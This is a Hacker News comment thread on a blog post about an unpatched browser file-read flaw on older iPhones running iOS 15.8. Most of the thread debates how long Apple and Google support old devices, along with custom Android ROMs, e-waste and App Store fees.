No new iPhone? No secure iOS: Looking at an unfixed iOS vulnerability (joshua.hu)
359 points by akyuu 11 months ago | 230 comments



Always a smile when I see my blog posted on hn:)

To answer three questions:

1) this was not reported in the context of any bug bounty[0], and the total conversation between me and Apple is 4 emails (1: hello do you plan to fix this? 2: can you reproduce this on the newest ios17? 3: no. 4: if you are able to reproduce it on ios17 let us know)

2) exfiltration is obviously possible, I’m not sure why I would even need to specify that any page is able to read its own contents using JavaScript

3) the iPhone 6s and 15.8 are still seemingly supported by Apple.

[0] and you won’t find me on any bug bounty websites except for where I try to get contact with humans, see https://joshua.hu/slack-is-broken-with-noscript


You didn’t answer the biggest question: being able to read /etc/passwd does not imply being able to read any of the sensitive files listed under “What files could somebody steal? Well, there’s always:”. Did you actually test any of those?


I only tested passwd at the time and I don’t currently have access to the 6s to test the other files. I can report back whenever I get access to that phone again.


Getting in touch with a human is generally "easy": getting in touch with an engineer isn't.

It's sad that one has to open a bug bounty request to get an engineer to look into an issue like the one you described in your linked blog post.


It's always a fun and interesting read when your posts hit HN.

How much time would you estimate goes into researching? And do you have any pointers for someone who wants to dip their toes into this vast sea of exploration?


This wasn't really my "finding" per se (the original vulnerability was from June, after all), it was just something that caught my eye and I thought it would be interesting to discuss the implications and some perceptions I have based on it.

>And do you have any pointers for someone who wants to dip their toes into this vast sea of exploration?

Can you expand on what you mean by this exactly? I got into security by accident when I was a child and have never followed any type of routine when it comes to learning.

Probably the only pointer that may help is: take something that you know and use often (some piece of software) and ask "what if?" or "why can't I or someone do X?" ¯\_(ツ)_/¯


> exfiltration is obviously possible, I’m not sure why I would even need to specify that any page is able to read its own contents using JavaScript

Things that are obvious to you may be non-obvious to other people, including the readers of your blog.


In the context of their blog post, it's assumed that the reader has some knowledge of web technologies — if you can print data to your own webpage, you can also exfiltrate it.

It's not reasonable to expect the author to explain _every_ underlying technology involved since that was likely not the scope of the post.


Welcome to HN, in as gentle a way as possible I refute this statement

> Apple continues to support nearly-decade-old devices like the iPhone 6S, which and iOS 15.8 is still powering those devices, seemingly with official Apple support, with the latest update from October the 25th, which addressed some security vulnerabilities.

With: try to update your Apple Watch with a device running the latest iOS 16


https://ibb.co/fn84p09

This photo was taken the day the blog post was published.


And yet, I am still unable to update my Apple Watch with the latest iOS 16. iOS 17 is now required. iOS 17 is also required to rent a movie on my Apple TV.

So, to the author's assertion that "Apple does a good job supporting old hardware", they may give some security patches but interoperability between current and previous versions is seemingly deliberately broken.


I feel this is misleading as most iPhone users are totally aware that iPhone Models not running iOS 17 are not being actively updated.

The list is widely published: https://support.apple.com/guide/iphone/models-compatible-wit...

Any model more than 5 years old (Xr and Xs) are essentially not being updated and not secure. So an iPhone 1, 3, 5, 6, 7, 8 and X are all not secure and most people who use the iPhone are totally aware of this.

It's like writing an article that Windows 7 is insecure and Microsoft isn't patching it. This is essentially their policy in most cases.


This is about the browser, not the OS. The unique thing about apple is that they tie the browser to the OS. So you won't even get application updates, which is quite surprising for anyone that has ever touched a computer.

That is some Windows 98 nonsense right there.


I understand your point, but I just think the headline.... "No new iPhone? No secure iOS" is misleading, because iPhone xR and xS, iPhone 11, iPhone 12, iPhone 13 and iPhone 14 models are all not new iPhones, but they receive secure iOS updates. The headline suggests only brand new iPhones are secure, but when you click they are talking about deprecated devices more than 5 years old that most users know do not receive updates just like Microsoft/Android or any other vendor, Apple explicitly stated they won't update these devices and most users are aware of this fact.


IIRC the browser is a part of the system because the engine is used everywhere in the system. For a long time in iOS it was WebKit that rendered attributed strings for instance.


FYI that is exactly what Microsoft proclaimed back in the day.

Doesn't sound better today does it?

At least on Windows they didn't prevent you from installing a different browser.


Windows and Android both come with a "built-in" browser:

Windows still ships Internet Explorer for rendering some old components, although I think they are moving to Edge (chromium) based web view. I can't find a better source right now, but something to start with: https://www.reddit.com/r/Windows11/comments/11n79xc/why_does...

Android has a chromium based WebView that ships with the system and is updated via Play Store: https://www.techtarget.com/searchsecurity/definition/Android...


... yes, but they are decoupled from the actual browser. Which makes all the difference.

My 10 year old android phone still runs the latest versions of both Chrome and Firefox.

Android's WebView being on the Play Store even allows that part of the system to be updated independently of the OS.


I have been a developer and nerd for 25 years, and I always expected that Apple also patches some previous versions. E.g. around a week ago they released both iOS 17.2.1 and iOS 16.7.4: https://support.apple.com/en-us/HT201222

So why should I assume that the latest iOS 16 isn't completely patched? I think it's a shame, to say the least, that Apple has no public policy of which OS versions are supported and which are not; it's just guesswork. Whereas I definitely know how long Microsoft supports Windows versions, e.g. Windows 10 until October 14th, 2025: https://learn.microsoft.com/en-us/lifecycle/products/windows...


It's not completely patched. Stop assuming. I've always assumed that Apple or Google or Microsoft consider three factors for deprecated devices or software: 1. Severity of Issue, 2. Expected work required to fix issue, 3. Number of users involved

I think if something is a relatively easy fix and high severity that they will fix it. I don't think they view security updates as a tool to force people to buy new products. The low hanging fruit for large numbers of users gets fixed. The underlying software however, should not be trusted or viewed as secure.

Even though these applications are bundled with the operating system, they are probably separate code bases and if they believe the patch can be accomplished across the versions with minimal work, like fixing the same line of code in the old version, it probably goes out. If they have to do a major overhaul of the old operating system and port the new browser version to the old software, it probably doesn't.


I’m pretty sure most iPhone users are unaware of which version of iOS they run.


Exactly my thought as well


This is addressed in the second paragraph of the article. The iPhone 6S had an OS update in October 2023 (iOS 15.8) which included a security fix for a different issue. The Chromium security issue was fixed in June 2023.


According to the link Xs is supported.


The parent comment says this - anything _older_ than XR or XS is no longer supported


> Any model more than 5 years old (Xr and Xs) are essentially not being updated and not secure. So an iPhone 1, 3, 5, 6, 7, 8 and X are all not secure and most people who use the iPhone are totally aware of this.

That reads very much like X's are not supported. The 2nd sentence even says it explicitly.


That was about the literal iPhone X (the letter X). The iPhone Xr and Xs (roman numeral 10) are still supported.


It’s made more confusing by the fact that the comment omits all the S models from the list of unsupported models (along with the iPhone 4 for some reason).

So at a glance one could assume that the XS is lumped in with the X just like the 6S is lumped in with the 6.


Sorry for my poor drafting. I agree with your comment.


/etc/passwd is the same on every device because it is in the system image, which is world readable. I don't think this exploit can be used to read the call history database as the author implies because it is outside of the sandbox profile.


It probably does let you grab cookies and browsing history from Chrome, though.


> probably

I wish the author included a full proof of concept


They provided a complete exploit. It's only about 50 lines long. If you want to know if it works with other files it's pretty trivial to see for yourself.


Yeah the author goes a bit far in their hypotheticals, straight into fantasy.

Also not sure I agree with the implication that Apple shouldn’t publish which vulnerabilities they’ve patched (the only logical conclusion because the alternative, patching every version in perpetuity, is unrealistic).


Apple, in my opinion, does a very good job of supporting old devices. Buying an iPhone and keeping it for 6 years is a great strategy and when amortising the cost of the phone over those 6 years, it's price competitive with Android.

I do wish legislators forced Apple and Google to give users a path to install an alternative OS on their device. That would enable old iPhones (and Androids) to have their lifetime extended further.


> I do wish legislators forced Apple and Google to give users a path to install an alternative OS on their device.

All Google phones allow installation of alternative OSes (and are pretty much the only phones that allow resigning the boot loader so they're still secure - which is why they're chosen by projects like GrapheneOS). Why do you think they need to be forced into anything? You can buy a Pixel right now and run an alternative OS.


I interpret their comment as suggesting that Apple should adopt a similar approach, and that Google, as a platform owner, should mandate this requirement for licensing Android™ (not AOSP) to other OEMs (I've had several phones whose bootloader couldn't be unlocked), and for this to be a practice enshrined by law for any other such companies that could operate in a similar position.


I think the biggest problem is in the alternative OS. Non-official OSes are typically unstable enough that I personally find them not worth the time, given that a phone is quite an important piece of communication equipment. As others have already mentioned, certain lines and brands, such as OnePlus, Google Pixels, etc. have unlockable bootloaders so people are free to install custom OSes.


I've been installing alternative ROMs on my android phones for almost 15 years. Never did I have any stability issues, on the contrary: the community ROMs often did a much better job than the official ones in terms of battery management, etc.


Not trying to contradict what you say, but my experience from a few years ago was:

* If you don't use a super popular model, you would have very few choices for custom ROMs
* Often custom ROMs are still at the mercy of the original manufacturer for certain hardware support -- e.g. they need to release a "base AOSP image" or something like that
* Custom ROMs often had random things not working, e.g. NFC not functional or cell/WiFi signal weaker than stock ROM
* Some come with certain crappy preinstalled apps. Sure you can remove them, but still annoying
* Battling SafetyNet was a cat-and-mouse game which I gave up
* Browsing the xda-developers forum and following the latest reply of a 10-page, 200-post thread like back in the early 2000s was the only way to get updates for a certain ROM. OTA updates were mostly out of the question
* ... and many more added to this

I don't know how much has changed, hopefully a lot. I don't doubt that if you have a phone of a popular model, you can find a custom ROM that does not make compromises and is much cleaner and better than the stock ROM. But these days I simply don't have any time for taking the risk and messing with these things and worrying that WiFi might not work in some cases.


Yeah I know some devices already support this, the point of forcing it via legislation would be for those that don't.

I think this is also the answer to "the app store question". It feels unfair to force Apple to change a core value proposition by forcing them to allow side loading, but in the spirit of "It's my device" it should be possible to install an OS that makes a different tradeoff e.g. Android


>Buying an iPhone and keeping it for 6 years is a great strategy and when amortising the cost of the phone over those 6 years, it's price competitive with Android.

What's stopping you from keeping your Android 6 years, making it an even better value? Most people I know don't throw away their Androids after 3 years but keep them as long as iPhones. Basically until it breaks/dies. So far I don't know anyone who got hacked and suffered damages for using an Android that stopped getting updates.


Shorter patch cycles - at least historically, I haven't kept pace with the Android ecosystem. That said, with Android you can use a different OS and keep the device secured


Sure, but like I said, people don't throw away their phones once they stop getting SW patches, the same way they don't throw away their ancient Macbooks with glowing Apple logos just because Apple stopped pushing OS updates years ago, because most non-HN people have no idea what patches are and they keep their phone and laptop as long as it still works and the battery lasts.

Obsession with zero day patches and security hypochondria is mostly a HN/tech-workers thing, as if they're under attack by state actors using Pegasus. The average joe doesn't care, nor is he very likely to be impacted, unless using Android Jellybean or something, since most malware in the wild out to get them is script kiddie level, not state-actor level.

And anyway, someone correct me if I'm wrong, but from my knowledge and experience with Android security, most Android critical vulns that can impact the day to day security of the Average Joe are covered by updating Google Play services and Chrome or whatever browser you use as those are the main attack surfaces for (non state sponsored) malware based on what people do with their phones, and those services keep getting updates from Google long after the manufacturers stopped pushing OS updates.


> So far I don't know anyone who got hacked and suffered damages for using an Android that stopped getting updates.

That’s a “hope for the best” approach to security, for me it’d be irresponsible to recommend it to even friends and family.

But if you want to do it with knowledge of the potential problems — go for it. It’s your phone and your data.


Please don't twist my words. I never said anything about recommending such a lifestyle to people. All I said was, using older devices without SW support, is the reality for a lot of people if you care to leave the tech bubble and see what devices people actually use, especially the not well off ones. Yes, a lot of people keep using their older device and they haven't got hacked. How do you get them to stop using their older devices, if they're happy with them and see no obvious threat and don't want to buy a new one?

Here's a thought exercise: Most people use their device for browsing the web and messaging people, right? So as long as you keep your Play Services, browser and messenger apps up to date, how will malware get to the outdated layers of your OS to PWN you? Especially since modern web browsers and Android use sandboxing for apps and web tabs. I'm talking about realistic documented scenarios from the wild that have happened and are likely to repeat again, not state actors or scenarios from research labs where they hack you through the firmware vulns of the baseband modem.

Like I said, I'm not recommending you still use unpatched devices, but the realistic risk from using an Android device that stopped getting updates a year or so ago is relatively minimal in practice, otherwise there would be mass hacks and credential thefts left and right on a daily basis considering how many unpatched Android phones are out there.


Not when you can load an OS like Calyx [0], GrapheneOS [1] or LineageOS [2]. In this context the iPhone ends up the true "hope for the best" option. The original Pixel / Pixel XL (2016.10.04) can still run the latest LineageOS with current patches [3].

[0] https://calyxos.org/
[1] https://grapheneos.org/
[2] https://www.lineageos.org/
[3] https://download.lineageos.org/devices/sailfish/changes


I was responding to the parent who recommended using unpatched, out of support Android.

People who’re comfortable (or can be bothered) installing alternative OSes on their phones have an entirely different view on device obsolescence. Statistically they’re also a rounding error in the total mobile-using population.


> Statistically they’re also a rounding error in the total mobile-using population.

Understood, but that has no bearing on the point being argued. You have no control over Apple iOS hardware after Apple stops supporting it. The fact that there is that "rounding error" is good for everyone as it is a force against closing that ecosystem which currently exists. It matters.


Well, Android patching after 3 years is a pretty new thing compared to Apple's policy. Apple was and is keeping security updates going for a very long time, with major updates on top of that for iOS. Not knowing someone does not mean they will not be hacked, or have not already been, by downloading some app from the store.


Yes, Apple is supporting older devices, but has made my SE 2020 nearly unusable (slow as hell, horrible UI bugs when typing) after updating to iOS 17. Everything worked perfectly until then. It seems as though Apple wants me to buy a more expensive phone. A friend had the exact same problem and now upgraded to a newer model.


No real change is going to happen. Out of all the mobile phone users out there, likely no more than 0.1% will ever consider installing alternative OS on their phone, even if allowed by law. Just look at the size of the custom ROM community in Android and real world impact.


> After contacting Apple […]

I’d be very curious to see HOW they contacted Apple. Depending on if you’re reaching out to security or just filing a standard radar I’d expect a very different answer.

Also, was it reported to the WebKit team? If that is where the bug is, perhaps that’s who should be taking the report?


It can make a big difference who reads the ticket. I might see something come in and think oh yeah that'll take me 5 min to fix and I'll just do it, but if someone else unknowledgeable about the feature sees it, or a PM... it might get closed as won't fix at best or just rot for 10 years.


OP here. It was reported to product-security@apple.com.


This is a 10 year old phone, released in 2014. Edit. I was wrong, 2015, sorry


This bug touches nothing hardware specific. In an alternative timeline where mobile OSes aren't Fisher-Price parodies of proper operating systems, they could push the same image to all iPhones and have a proper hardware abstraction layer take care of the specific details.

There is nothing fundamentally incompatible about the last couple of generations of iPhones. ARMv8 CPU, PowerVR derived GPU. If the mobile computing space weren't driven by greed, this would be a non issue.

A Sandy Bridge era intel machine deployed in 2011 is easily capable of running the latest Linux, BSD or win10. And in the case of the first two, I'd wager it will continue to be viable for the foreseeable future.


It’s not economical to support devices used by less than 1% of the user base. Linux only manages it because community members step up to support older architectures. And sometimes when no one steps up the architectures are removed.

- Linux dropping support for old graphics drivers (Nov 2023) - https://www.phoronix.com/news/Linux-Drop-Old-UMS-DRM-Infra

- Linux Kernel Developers Discuss Dropping A Bunch Of Old CPUs (Jan 2021) - https://www.phoronix.com/news/2021-Linux-Drop-Old-CPUs

Supporting all of these is work. It makes development of new features harder, because it has to account for quirks of older hardware. Older hardware is also harder to get in the hands of developers and harder to test on. That’s why Linux has dropped support for 386, 486, IA-64 and other architectures.

There’s no point saying trillion dollar corporation etc. It comes down to some basic fact - phones must be built with SoCs, that’s the easiest way. The PC way doesn’t work at scale. Now that we are on SoCs you have to draw the line on support somewhere. Just because the costs imposed on future development aren’t obvious to us doesn’t mean they don’t exist.

I think 5 years minimum (and sometimes more) of OS updates is pretty good, FWIW.


It’s absolutely economical. Apple only has to support a tiny number of devices that they themselves manufactured, they have the easiest job in the world.

Think about how many devices Microsoft has to support in Windows, it’s orders of magnitude more.

Apple doesn’t want to support older devices because they don’t see a benefit to themselves.

5 years of support is pitifully short. Pretty much everything I own lasts longer than 5 years, my phone is one of the things I have to replace most often, not because the hardware is broken, but because it stops receiving updates.


[flagged]


> New devices = New components = New Firmware = The updates have to stop sometime

So how does microsoft do it? My PC is about the same age yet it is still supported. And not even barely, but without a hitch.

> Apple is an OEM for most parts on their board, if upstream support ends for the components on the board then its game over as far as firmware updates goes.

But this is not an issue with a chip's firmware. Do you believe apple can't compile code for their 10 year old hardware or how do you think this happens?


>And its certainly NOT economical to keep stuff running forever. Look at OpenBSD and Theo famously begging for money to keep his basement of antique equipment running at enormous expense !

If OpenBSD can do it on a budget that's pocket change for Apple, with much more diverse hardware which they have no control over, then Apple definitely can do it.


Is it really bullshit? Lenovo manages hundreds of laptop models via fwupd, and those work just fine after they lose OEM support. I've got a Thinkpad from 2009 that still gets modern Linux patches (to say nothing of my 2006 PowerBook running Arch/Plasma 5).

Compared to what Apple makes off hardware and service revenue, the cost of opening iBoot and providing basic firmware support would be almost nothing. It's so economical that the volunteers at Asahi were capable of replacing the missing bits via black-box reverse engineering. You want to tell me that Apple is incapable of releasing that firmware themselves? On a technical forum?


> Compared to what Apple makes off hardware and service revenue

Really I wish people would wake up and stop with this bullshit.

Do the other manufacturers do anywhere near as much R&D as Apple does? NO! (2023: Lenovo 2bn vs Apple 29bn).

Do the other manufacturers maintain their own OS across multiple hardware platforms? NO!

It's easy to sit in your armchair and spout crap about "well, Lenovo does it!". Well, the OS on your Lenovo is Windows or Linux. And the parts in your plastic Lenovo are almost certainly 100% off-the-shelf commodity parts.

Meanwhile Apple's R&D is what brings you, for example, the unmatched Apple Silicon chips, which everyone except the die-hard Apple bashers agree are genuinely industry leading.


Really, you've just proven my point. If Lenovo can support their hundreds/thousands of devices on a shoestring budget, Apple can support their few dozen devices easily. They've already written the device drivers and documented their non-commodity hardware, there's no technical reason it won't run other OSes.

I almost feel like you don't actually know what you're arguing against. An optionally-open bootloader is practically free to implement, and releasing driver code (or at least hardware docs) would mostly be an IP-related decision, not an effort-gated one. As-is, it feels like you're defending Apple's right to enforce petty limitations and be lazy with their trillion-dollar IP. It should be obvious why we (former Apple customers, some of us) disagree.


Lmao Apple R&D. Don't know what they're spending it on since they almost always adopt technologies that have already been developed + proven in the market.

So Apple spends 29bn on R&D every year, over many years, and ends up developing... a really good (if not currently the best, sure) version of an ARM chip, a pre-existing architecture with which they are already intensely familiar? Wow, they're sure being real efficient with those funds.

I believe a lot of their performance gains pretty much just come down to larger die size than most ARM CPUs, making an SoC and colocating memory etc. all on the same die, wrangling some of TSMC's newest, most transistor dense and power efficient nodes. M1 Ultra=114b, 64 core Graviton3=55b, hell people are even building stuff like https://www.jeffgeerling.com/blog/2023/everything-ive-learne....

Apple went for a bunch of easy wins tbh. Why doesn't every other computer manufacturer do it? Well Apple is a $1T company; they control so many aspects of their products, OS, software etc so very easy for them to offer this. It would require a concerted effort on the part of so many companies involved in the ecosystems of non-Apple products to make a transition the same way Apple did.


>It’s not economical to support devices used by less than 1% of the user base. Linux only manages it because community members step up to support older architectures. And sometimes when no one steps up the architectures are removed.

Again, bugs like this are not hardware specific. You are not supporting "devices". You are supporting the OS which all of them run. Ideally (I'm not familiar with OSX/iOS internals) all they have to do is push out an update that contains the newly fixed libwebkit.so or whatever. They control everything on their own platform so they don't even have to deal with glibc breaking backcompat like we have to in the GNU/Linux world.

If they can't figure out a way to make changes like this universal across devices, it's either deliberate negligence or incompetence.


You're a special kind of clown claiming that it is not economical while Apple's profits are somewhere between 20% and 26%. They could build an update, they just prefer making more money.


Shrug. That's their problem. Or it should be, at least.

Don't sell crap you can't support for a decent amount of time. Stop ruining this planet we live on by creating immense amounts of e-waste every few years.

We both know your argument is dishonest or at least naive, though. They could easily support updates if they want to. But it's about money. This way they are forcing people to buy a new phone every few years. It's clever, shame about the planet.


> dishonest

Dishonest? You're saying I'm lying to support a trillion dollar corporation I have no financial stake in and never have? Is such an accusation really in the spirit of this forum?

I suggest you review the guidelines - https://news.ycombinator.com/newsguidelines.html

Don't be snarky. Don't sneer. Assume good faith.


I will say that certain comparisons (eg. "The PC way doesn’t work at scale") are objectively wrong. Even Apple uses the PC model internally, despite not having an open bootloader or really supporting UEFI anymore. AFAIK, the XNU kernel even uses the same DeviceTree layout as Linux for supporting ARM SOCs. Apple hasn't really broken any new ground that can't be re-covered by modern operating systems.

Also, your claim that it's "not economical" is entirely unproven and arguably false. iPhones are still architecturally supported by Linux and will continue to be for a while (even longer on BSD). Other Apple products (eg. Apple Silicon) received community driver support entirely from donations and volunteer time. There's no reason to assume that iPhones lack community interest, especially since Apple has never given the iPhone community the same leverage they had on Mac.

If that's the sum of both arguments, then you're mostly just leveraging FOMO to support an unproven concept. At best you're jumping the gun, at worst you're twisting the facts to preclude discussion of open iPhone software alternatives.


Apple still sells previous phones as lesser, but still not very affordable, models. The iPhone 7 was released in September 2016 and discontinued in September 2019. It is also on iOS 15.8 so presumably also vulnerable to this. That would be about 4 years of security updates. Not the worst but not beating what e.g. Google promises for Pixel phones now.


I looked it up, and the extended security updates for Google Pixel is only a recent change:

Pixel 8: released in 2023, updates through 2030
Pixel 5: released in 2020, stopped getting updates in October 2023.

https://support.google.com/pixelphone/answer/4457705?hl=en


Looks like I hit a 'sweet spot' with my Pixel 4a (released in August 2020, guaranteed updates until November 2023)


I use a Pixel 4a as a second phone and consider Google’s approach to be rubbish…

3 years worth of updates is pretty shit… my son’s iPhone 5c got updates for over 5 years (and I think there were some security issues they patched after that even)

At the moment I’ve got a perfectly usable Pixel 4a that I’m going to have to replace as it’s not secure enough for work related stuff anymore


You can't seriously give Apple shit for this and at the same time praise Google. iPhones have, pretty consistently since the 5 or so, received 5 or 6 years worth of OS updates since the phone's release whereas with Android phones you'll receive 2. Only after years of complaining is Google finally promising to support it for longer. And that doesn't cover Samsung, etc...


We can and should praise Google for improving things, and use their new strong points to push Apple into improving too.

This isn't a debate about what company is better. The word "now" is used for Google's promises for a reason.


> We can and should praise Google for improving things, and use their new strong points to push Apple into improving too.

Over a decade of Nexus then Pixel devices being flashable has not moved any needle of Apple doing the same. Google promising 7 years is in line with Apple's 10 year track record of providing 6-8 years of updates, so it's more like Google aligning with Apple, not Google pushing Apple.

Still, a vague† promise in a blog post or keynote address is not going to fit the bill, at the very least it should be in the EULA or other contractually enforceable document, otherwise the promise is worth nothing.

Ideally I wish software would be treated as with e.g. automotive or washing machine manufacturers, who in the EU have a legal requirement to provide parts for 10 years.

† I mean the promise is clearly worded but bears no weight, especially when pitted against Google's track record over the last decade of making grand announcements then pulling the rug down the road.


> We can and should praise Google for improving things

Let’s talk again in 5 years, once they had the opportunity to prove their plans. So far, it’s all just talk.


Especially since a 10-year-old phone was very weak in terms of hardware; we hadn't reached a more plateaued era back then. It's much easier to update a phone from the last 5 years for 10 years than to do the same in a window 5 years earlier.


Never forget the Pixel Pass rug pull. I'll never buy another Google product.


But Android also lets you run custom builds, and my 2016 phone runs the latest OS. Sure not everyone does this, but unlike iOS I can take care of it myself.


> my 2016 phone runs the latest OS. Sure not everyone does this, but unlike iOS I can take care of it myself.

"not everyone" is an understatement.

That's a solution for you (and the dozens - dozens! - of people doing the same), in practice it is not for 99% of Android users, therefore, again in practice, there's a huge fleet of devices with out-of-date software out there.

> But Android also lets you run custom builds

That's not even counting that:

- many Android manufacturers make it non-trivial† to root/unlock/flash a build and/or make it blow a warranty fuse, and that's if it's even possible at all.

- usually the camera goes ape shit, and often loudspeaker audio quality too.

- unless you relock the bootloader it immediately compromises security and makes bootloader updates nontrivial as unlocking again clears the device.

Mind you, this is a fine, intellectually satisfying strategy for you and me to be able to flash open builds, but it's by and large an extremely fringe strategy, and it's been shown over a decade that it's staying that way.

† Often involving downloading random flashing tools from obscure forums, that run only on Windows, some of these being one-shot and requiring you to plug in magic numbers corresponding to your exact device, and if you screw it up the device is bricked (e.g. Samsung). Or the unlocking is on a low-write-count chip and once you exceed that limit the device is bricked (e.g. OnePlus). I know, I've been there, bricked a few, recovered only one through JTAG.


Does it really let you run custom builds when it zeroes out proprietary firmware blobs on many models, turning your fancy camera into a shitty basic one? Or what about the million proprietary blobs you would need for full functionality — will those also get patched?


> But Android also lets you run custom builds

Yes, but that is only one component of a modern phone. Basebands and system bootloaders, among other firmwares, don't receive updates. Those are regularly attacked.

It's good that they do but it's not enough.


I feel like the security update period should really be measured from the date of last "as new" sale, not date of original release.


Personally I don’t think Apple’s level of support is incredibly bad when you take a look at the used device market. Even with Apple’s famously high resale values, depreciation on smartphones is huge.

Don’t buy old phones brand new from Apple, they’re a ripoff. If you buy either an iPhone 12 or 13 used for $250-350 you can basically plan on a $50 a year budget to have a smartphone that always has the latest OS judging by their expected remaining lifespans.

I think the big flaw with the status quo is e-waste more than cost to the consumer. I think an iPhone 6S or 7 are incredibly slow and outdated devices for today’s usage but in 5 years I don’t think we will be able to say the same thing about an iPhone 12 or 13. Smartphone hardware is far more mature now than it was even 6 generations deep into the iPhone product line.

We should be able to replace batteries for $20 and replace things like broken screens for not much more, and Apple should be enthusiastic about it considering how services are their bread and butter moving forward. Apple should be happy to produce fewer phones and keep more consumer dollars allocated toward the purchase of high margin digital goods.


> I don’t think we will be able to say the same thing about an iPhone 12 or 13

The wildcard here is local LLM use cases and any new hardware that increases their speed by orders of magnitude.


That’s not really a need for smartphone users. I can access an LLM on a website for free right now.

I also don’t see any indication that there will be impactful local LLM silicon at the smartphone scale anytime soon.


You can yes, but the rumor is that Apple is focusing on adding them directly to your device, and if they integrate it deeply in the OS, then it will require the chips to run it. I’m sure you will be able to run old devices but without the latest Siri for example.


Can I get a user replaceable battery instead?


I just want a glorified iPod from my old phone that won't get pwned at the airport.


I still use a 6s and a first-gen SE, I won’t say they’re terribly slow. It’s the apps, the modern apps, that make the device too slow. If you use not so many, it works quite well. The only downside is that the OS is not updated any longer. Although I got a security update recently, weeks ago.


Not yet, I believe. Revenue from iPhone sales is still quite fundamental to Apple’s success, it’s more than triple the revenue from all services combined (not including Google’s search engine deal).


>but still not very affordable, models

The 2020 SE is available from a wide variety of sources for 200USD (still new in box); it'll be supported until 2027. The 2022 SE is 400USD, supported until 2029.

By comparison the Android phones at this price point functionally went out of support 2 years before they even existed- not only is there zero support for them, but they ship with outdated OS versions to begin with. And no, "but I can go to XDA and get a shitty ROM at the cost of my camera" doesn't count as support.


You had a strong first paragraph, but your second is going too far. A Pixel 6a is $349 and supported until 2027. A Galaxy A15 is $175 and supported until the end of 2028 or early 2029. The full feature updates don't go quite as far, but they're still offered for multiple years into the future.


Isn't the Pixel 6 when Google stopped using Qualcomm modems, and now has terrible signal reception?


> Google promises

While Google promises, Apple actually has a decade long track record of updating older phones for 5 or more years. We don’t know if Google will actually follow through on their promises or the execs in charge in 5 years will feel differently. But I personally bet $1000 that the iPhone 13 will get 5 years of OS updates minimum.


Promising is easy - google can’t keep maintaining successful apps of theirs, let alone a whole phone.

I’ll believe it at 6 years in, maybe.


Google promises. I don’t believe their promises after what happened to Google Reader.


Apple: proven track record

Google: promises

you're being disingenuous


> Google: promises

Google is not promising this out of the goodness of their heart. They're just getting ahead of what the EU is planning to mandate [0], and doing that to get some good marketing while they're at it.

So, while Google's track record leaves a lot to be desired, in this, I think they'll keep their promise, either because they actually care, or because the EU will force them to. Either way, we, the end users, will benefit from it.

And this will apply to all electronic device makers. That's probably why Samsung also increased their updates policy to five years as well.

[0]: https://www.insideprivacy.com/cybersecurity-2/eu-publishes-d...

> "The requirements apply for the lifetime of a product or five years from its placement on the market, whichever is shorter."


>Google is not promising this out of the goodness of their heart. They're just getting ahead of what the EU is planning to mandate

If that was the case then why did Google exceed the requirement by 2 years? Additionally, Google is providing 7 years of OS upgrades and 7 years of security updates. Google could have easily just done what they did with the Pixel 7 and offered 3 years of OS upgrades and 5 years of security updates, thus meeting the EU requirement of 5 years of updates. So to claim that Google offering an industry-leading 7 years of OS upgrades and 7 years of security updates is not out of the "goodness of their heart" is being disingenuous IMO.


> Apple: proven track record

> Google: promises

Do you really think the cost of the class action lawsuit and settlement and the bad publicity for not adhering to their 7 years of support would not exponentially exceed the cost of a team of engineers tasked with supporting updates for their Pixel phones?

As for "promises" - why hasn't any other OEM matched or exceeded Google? Apple should have been the first one to step up the very next day.


It was difficult to locate but I found a new iPhone 7 for sale for $92. Seems affordable.


Google doesn’t have enough e-fuses to update the pixel phones for seven years, the marketing department is incompetent and didn’t talk to literally the only engineers they should have.


Is there a reason you think most updates would even want to blow e-fuses, let alone need to?

And how many are there, then?


Does the Pixel 8 use e-fuses? I was under the impression that it used a stored rollback index to prevent OS rollbacks.


It's fine for a vendor to completely abandon 10 year old hardware but if you can still pay 30% App Store tax/pay for iCloud/etc, the security fixes should be backported as well. The current situation is charging full price for inferior (or maybe even dangerous) product: Apple wants to have its cake and eat it too.


I don't totally follow this argument. the 30% app store commission, iCloud subscription, etc. does not only fund security fixes for the OS and core services. I don't think the average consumer thinks that's what they're paying for either. waiving the fee for EOL'd devices would create a perverse incentive of its own.

I do wish apple would follow google's example and commit to a service lifetime upfront, but other than that, I don't object to their model. in practice, it vastly exceeds the level of support for any android phone other than the pixel 8, and we have yet to see whether google actually follows through on that.


Also it means that at some point, Apple would have to actively block some legacy devices from using iCloud, App Store, Apple Music, any app with subscriptions etc. which would effectively make the device pretty useless.


Are you really saying Apple should actively break interoperability with old software?


They should stop charging 30% App Store tax for an inferior product at the very least.


App Store purchases aren't tied to a particular device; you can buy an app on an old device and keep using it when you get a newer device. Do you have a coherent, reasonable suggestion for how Apple could modify their business model without completely breaking it, or are you just desperate to shoehorn complaints about the App Store fees into the conversation?


Easy: offer a discount if purchase is made on an unsupported device, just like how grocery stores offer discounts for food that's about to expire.

I don't think there is a real concern about app store economics collapsing, the app marketplace business is very lucrative. We can see this in related cases: you can avoid certain iOS taxes by purchasing your subscriptions on the web: Twitter Blue is $11 on iOS and $8 on the web. Spotify used to be $12.99 for iOS sign-ups and $9.99 on the web.

Why should users pay full bundled iOS tax that supports security updates, if they are getting none?


> Why should users pay full bundled iOS tax that supports security updates,

I don't think I've ever seen someone express the expectation that Apple's App Store fees are for the purpose of supporting iOS development and maintenance. Mostly I've seen and heard the expectation that those fees are connected to running the App Store itself (payment processing, hosting, app review, etc.) and beyond that, vague profiteering. iOS itself isn't a subscription service, and Apple seems quite happy to sell you devices even if you don't spend money in the App Store. So you seem to be stretching a bit by attributing those fees to iOS maintenance and then turning around to say that unsupported iOS versions should get a discount on the fees for any services that still work.


Your purchases carry forward to newer devices, no? If nothing else, people would keep an older device just to make purchases and then install it on their newer iPhone.


They're not charging you, the user that 30%. They're charging the developer. Yes that does trickle down to you in the developer's pricing, but, in this instance, a phone no longer receiving security updates is not an inferior product from the point of view of the transaction in question.


15% for the vast majority of developers and apps FWIW.


Probably true, but is it the same for the vast majority of the app revenue? Quite possibly not.


Why exactly? Does petrol get cheaper for an old car that barely works?


What does this mean? The App Store fees are paid by the developers / vendors. Are you saying they should pay less proportionate to the number of times their apps are downloaded to older devices?


> What does this mean?

It means they’re shoehorning another issue into this discussion.


I think it’s a completely valid point. Apple is still making (potentially a lot) of money off these old devices yet isn’t willing to fully support them. It seems very unethical.


> seems very unethical

I agree. Clearly Apple should do the only ethical thing and immediately ban all unsupported devices from new App Store purchases.

When Apple announces this (very ethical) policy change, I expect you to full-throatedly defend Apple from the mass shrieking cries of "but muh planned obsolescence!!" Right? Right?? ;-)

